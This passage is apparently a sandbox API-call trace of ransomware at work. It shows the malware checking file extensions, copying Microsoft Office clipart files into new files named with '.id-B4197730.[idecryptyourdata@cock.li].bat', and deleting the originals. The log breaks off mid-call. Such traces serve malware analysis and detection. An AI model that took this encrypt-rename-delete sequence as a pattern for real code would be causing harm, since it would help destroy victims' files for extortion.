Office\\root\\CLIPART\\PUB60COR\\FD01659_.WMF") returned 68 [0066.543] lstrlenW (lpString=".zip") returned 4 [0066.543] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0066.543] lstrlenW (lpString=".rar") returned 4 [0066.543] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0066.543] lstrlenW (lpString=".bz2") returned 4 [0066.543] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0066.543] lstrlenW (lpString=".7z") returned 3 [0066.543] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0066.543] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD01659_.WMF") returned 68 [0066.543] lstrlenW (lpString=".dbf") returned 4 [0066.543] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0066.543] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD01659_.WMF") returned 68 [0066.543] lstrlenW (lpString=".1cd") returned 4 [0066.543] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0066.544] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD01659_.WMF") returned 68 [0066.544] lstrlenW (lpString=".jpg") returned 4 [0066.544] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0066.544] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0066.544] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0066.544] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD02115_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd02115_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384 [0066.545] GetLastError () returned 0x0 [0066.545] ReadFile (in: hFile=0x388, lpBuffer=0x3adf020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesRead=0x2d0fecc*=0x1234, lpOverlapped=0x0) returned 1 [0066.614] WriteFile (in: hFile=0x384, lpBuffer=0x3adf020*, nNumberOfBytesToWrite=0x1240, lpNumberOfBytesWritten=0x2d0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesWritten=0x2d0fc94*=0x1240, lpOverlapped=0x0) returned 1 [0066.720] ReadFile (in: hFile=0x388, lpBuffer=0x3adf020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesRead=0x2d0fecc*=0x0, lpOverlapped=0x0) returned 1 [0066.720] WriteFile (in: hFile=0x384, lpBuffer=0x3adf020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2d0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesWritten=0x2d0fc94*=0xec, lpOverlapped=0x0) returned 1 [0066.721] SetEndOfFile (hFile=0x384) returned 1 [0066.721] CloseHandle (hObject=0x384) returned 1 [0066.721] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0066.721] SetEndOfFile (hFile=0x388) returned 1 [0066.722] CloseHandle (hObject=0x388) returned 1 [0066.722] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD02115_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0066.722] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD02115_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd02115_.wmf")) returned 1 [0066.722] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD02115_.WMF") returned 68 [0066.722] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD02115_.WMF") returned 68 [0066.722] lstrlenW (lpString=".doc") returned 4 [0066.722] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0066.722] lstrlenW (lpString=".docx") returned 5 [0066.722] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0066.722] lstrlenW (lpString=".pdf") returned 4 [0066.722] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0066.722] lstrlenW (lpString=".xls") returned 4 [0066.722] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0066.722] lstrlenW (lpString=".xlsx") returned 5 [0066.722] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0066.723] lstrlenW (lpString=".ppt") returned 4 [0066.723] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0066.723] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD02115_.WMF") returned 68 [0066.723] lstrlenW (lpString=".zip") returned 4 [0066.723] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0066.723] lstrlenW (lpString=".rar") returned 4 [0066.723] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0066.723] lstrlenW (lpString=".bz2") returned 4 [0066.723] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0066.723] lstrlenW (lpString=".7z") returned 3 [0066.723] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0066.723] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD02115_.WMF") returned 68 [0066.723] lstrlenW (lpString=".dbf") returned 4 [0066.723] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0066.723] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD02115_.WMF") returned 68 [0066.723] lstrlenW (lpString=".1cd") returned 4 [0066.723] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0066.723] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD02115_.WMF") returned 68 [0066.723] lstrlenW (lpString=".jpg") returned 4 [0066.723] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0066.723] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0066.723] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0066.723] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD02153_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd02153_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384 [0066.724] GetLastError () returned 0x0 [0066.724] ReadFile (in: hFile=0x388, lpBuffer=0x3adf020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesRead=0x2d0fecc*=0x1510, lpOverlapped=0x0) returned 1 [0066.773] WriteFile (in: hFile=0x384, lpBuffer=0x3adf020*, nNumberOfBytesToWrite=0x1520, lpNumberOfBytesWritten=0x2d0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesWritten=0x2d0fc94*=0x1520, lpOverlapped=0x0) returned 1 [0066.774] ReadFile (in: hFile=0x388, lpBuffer=0x3adf020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesRead=0x2d0fecc*=0x0, lpOverlapped=0x0) returned 1 [0066.774] WriteFile (in: hFile=0x384, lpBuffer=0x3adf020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2d0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesWritten=0x2d0fc94*=0xec, lpOverlapped=0x0) returned 1 [0066.774] SetEndOfFile (hFile=0x384) returned 1 [0066.774] CloseHandle (hObject=0x384) returned 1 [0066.775] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0066.775] SetEndOfFile (hFile=0x388) returned 1 [0066.775] CloseHandle (hObject=0x388) returned 1 [0066.775] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD02153_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0066.776] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD02153_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd02153_.wmf")) returned 1 [0066.776] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD02153_.WMF") returned 68 [0066.776] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD02153_.WMF") returned 68 [0066.776] lstrlenW (lpString=".doc") returned 4 [0066.776] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0066.776] lstrlenW (lpString=".docx") returned 5 [0066.776] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0066.776] lstrlenW (lpString=".pdf") returned 4 [0066.776] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0066.776] lstrlenW (lpString=".xls") returned 4 [0066.776] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0066.776] lstrlenW (lpString=".xlsx") returned 5 [0066.776] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0066.776] lstrlenW (lpString=".ppt") returned 4 [0066.776] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0066.776] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD02153_.WMF") returned 68 [0066.776] lstrlenW (lpString=".zip") returned 4 [0066.776] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0066.776] lstrlenW (lpString=".rar") returned 4 [0066.776] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0066.776] lstrlenW (lpString=".bz2") returned 4 [0066.776] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0066.776] lstrlenW (lpString=".7z") returned 3 [0066.777] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0066.777] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD02153_.WMF") returned 68 [0066.777] lstrlenW (lpString=".dbf") returned 4 [0066.777] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0066.777] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD02153_.WMF") returned 68 [0066.777] lstrlenW (lpString=".1cd") returned 4 [0066.777] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0066.777] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD02153_.WMF") returned 68 [0066.777] lstrlenW (lpString=".jpg") returned 4 [0066.777] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0066.777] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0066.777] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0066.777] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD02161_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd02161_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384 [0066.777] GetLastError () returned 0x0 [0066.777] ReadFile (in: hFile=0x388, lpBuffer=0x3adf020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesRead=0x2d0fecc*=0xc38, lpOverlapped=0x0) returned 1 [0066.782] WriteFile (in: hFile=0x384, lpBuffer=0x3adf020*, nNumberOfBytesToWrite=0xc40, lpNumberOfBytesWritten=0x2d0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesWritten=0x2d0fc94*=0xc40, lpOverlapped=0x0) returned 1 [0066.783] ReadFile (in: hFile=0x388, lpBuffer=0x3adf020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesRead=0x2d0fecc*=0x0, lpOverlapped=0x0) returned 1 [0066.783] WriteFile (in: hFile=0x384, lpBuffer=0x3adf020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2d0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesWritten=0x2d0fc94*=0xec, lpOverlapped=0x0) returned 1 [0066.783] SetEndOfFile (hFile=0x384) returned 1 [0066.783] CloseHandle (hObject=0x384) returned 1 [0066.783] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0066.783] SetEndOfFile (hFile=0x388) returned 1 [0066.784] CloseHandle (hObject=0x388) returned 1 [0066.784] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD02161_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0066.784] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD02161_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd02161_.wmf")) returned 1 [0066.785] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD02161_.WMF") returned 68 [0066.785] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD02161_.WMF") returned 68 [0066.785] lstrlenW (lpString=".doc") returned 4 [0066.785] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0066.785] lstrlenW (lpString=".docx") returned 5 [0066.785] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0066.785] lstrlenW (lpString=".pdf") returned 4 [0066.785] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0066.785] lstrlenW (lpString=".xls") returned 4 [0066.785] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0066.785] lstrlenW (lpString=".xlsx") returned 5 [0066.785] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0066.785] lstrlenW (lpString=".ppt") returned 4 [0066.785] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0066.785] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD02161_.WMF") returned 68 [0066.785] lstrlenW (lpString=".zip") returned 4 [0066.785] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0066.785] lstrlenW (lpString=".rar") returned 4 [0066.785] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0066.785] lstrlenW (lpString=".bz2") returned 4 [0066.785] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0066.785] lstrlenW (lpString=".7z") returned 3 [0066.785] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0066.785] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD02161_.WMF") returned 68 [0066.785] lstrlenW (lpString=".dbf") returned 4 [0066.786] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0066.786] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD02161_.WMF") returned 68 [0066.786] lstrlenW (lpString=".1cd") returned 4 [0066.786] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0066.786] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD02161_.WMF") returned 68 [0066.786] lstrlenW (lpString=".jpg") returned 4 [0066.786] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0066.798] SetFilePointerEx (in: hFile=0x354, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0066.798] SetFilePointerEx (in: hFile=0x354, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0066.798] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FLAP.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\flap.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x340 [0066.802] GetLastError () returned 0x0 [0066.802] ReadFile (in: hFile=0x354, lpBuffer=0x3adf020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesRead=0x2d0fecc*=0x816, lpOverlapped=0x0) returned 1 [0066.843] WriteFile (in: hFile=0x340, lpBuffer=0x3adf020*, nNumberOfBytesToWrite=0x820, lpNumberOfBytesWritten=0x2d0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesWritten=0x2d0fc94*=0x820, lpOverlapped=0x0) returned 1 [0066.844] ReadFile (in: hFile=0x354, lpBuffer=0x3adf020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesRead=0x2d0fecc*=0x0, lpOverlapped=0x0) returned 1 [0066.844] WriteFile (in: hFile=0x340, lpBuffer=0x3adf020*, nNumberOfBytesToWrite=0xe4, lpNumberOfBytesWritten=0x2d0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesWritten=0x2d0fc94*=0xe4, lpOverlapped=0x0) returned 1 [0066.844] SetEndOfFile (hFile=0x340) returned 1 [0066.844] CloseHandle (hObject=0x340) returned 1 [0066.844] SetFilePointerEx (in: hFile=0x354, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0066.844] SetEndOfFile (hFile=0x354) returned 1 [0066.845] CloseHandle (hObject=0x354) returned 1 [0066.845] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FLAP.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0066.845] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FLAP.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\flap.wmf")) returned 1 [0066.846] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FLAP.WMF") returned 64 [0066.846] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FLAP.WMF") returned 64 [0066.846] lstrlenW (lpString=".doc") returned 4 [0066.846] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0066.846] lstrlenW (lpString=".docx") returned 5 [0066.846] lstrcmpiW (lpString1=".docx", lpString2="P.WMF") returned -1 [0066.846] lstrlenW (lpString=".pdf") returned 4 [0066.846] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0066.846] lstrlenW (lpString=".xls") returned 4 [0066.846] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0066.846] lstrlenW (lpString=".xlsx") returned 5 [0066.846] lstrcmpiW (lpString1=".xlsx", lpString2="P.WMF") returned -1 [0066.846] lstrlenW (lpString=".ppt") returned 4 [0066.846] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0066.846] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FLAP.WMF") returned 64 [0066.846] lstrlenW (lpString=".zip") returned 4 [0066.846] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0066.846] lstrlenW (lpString=".rar") returned 4 [0066.846] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0066.846] lstrlenW (lpString=".bz2") returned 4 [0066.846] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0066.846] lstrlenW (lpString=".7z") returned 3 [0066.846] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0066.846] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FLAP.WMF") returned 64 [0066.846] lstrlenW (lpString=".dbf") returned 4 [0066.846] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0066.846] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FLAP.WMF") returned 64 [0066.847] lstrlenW (lpString=".1cd") returned 4 [0066.847] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0066.847] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FLAP.WMF") returned 64 [0066.847] lstrlenW (lpString=".jpg") returned 4 [0066.847] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0066.847] SetFilePointerEx (in: hFile=0x354, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0066.847] SetFilePointerEx (in: hFile=0x354, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0066.847] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00235_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh00235_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x340 [0066.847] GetLastError () returned 0x0 [0066.847] ReadFile (in: hFile=0x354, lpBuffer=0x3adf020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesRead=0x2d0fecc*=0x402, lpOverlapped=0x0) returned 1 [0066.859] WriteFile (in: hFile=0x340, lpBuffer=0x3adf020*, nNumberOfBytesToWrite=0x410, lpNumberOfBytesWritten=0x2d0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesWritten=0x2d0fc94*=0x410, lpOverlapped=0x0) returned 1 [0066.860] ReadFile (in: hFile=0x354, lpBuffer=0x3adf020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesRead=0x2d0fecc*=0x0, lpOverlapped=0x0) returned 1 [0066.860] WriteFile (in: hFile=0x340, lpBuffer=0x3adf020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2d0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesWritten=0x2d0fc94*=0xec, lpOverlapped=0x0) returned 1 [0066.860] SetEndOfFile (hFile=0x340) returned 1 [0066.860] CloseHandle (hObject=0x340) returned 1 [0066.860] SetFilePointerEx (in: hFile=0x354, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0066.860] SetEndOfFile (hFile=0x354) returned 1 [0066.861] CloseHandle (hObject=0x354) returned 1 [0066.861] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00235_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0066.862] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00235_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh00235_.wmf")) returned 1 [0066.862] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00235_.WMF") returned 68 [0066.862] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00235_.WMF") returned 68 [0066.862] lstrlenW (lpString=".doc") returned 4 [0066.862] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0066.862] lstrlenW (lpString=".docx") returned 5 [0066.862] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0066.862] lstrlenW (lpString=".pdf") returned 4 [0066.862] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0066.862] lstrlenW (lpString=".xls") returned 4 [0066.862] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0066.862] lstrlenW (lpString=".xlsx") returned 5 [0066.862] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0066.862] lstrlenW (lpString=".ppt") returned 4 [0066.862] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0066.862] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00235_.WMF") returned 68 [0066.862] lstrlenW (lpString=".zip") returned 4 [0066.862] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0066.862] lstrlenW (lpString=".rar") returned 4 [0066.862] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0066.862] lstrlenW (lpString=".bz2") returned 4 [0066.862] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0066.862] lstrlenW (lpString=".7z") returned 3 [0066.862] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0066.863] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00235_.WMF") returned 68 [0066.863] lstrlenW (lpString=".dbf") returned 4 [0066.863] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0066.863] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00235_.WMF") returned 68 [0066.863] lstrlenW (lpString=".1cd") returned 4 [0066.863] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0066.863] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00235_.WMF") returned 68 [0066.863] lstrlenW (lpString=".jpg") returned 4 [0066.863] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0066.863] SetFilePointerEx (in: hFile=0x354, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0066.863] SetFilePointerEx (in: hFile=0x354, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0066.863] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\HH00260_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\hh00260_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, 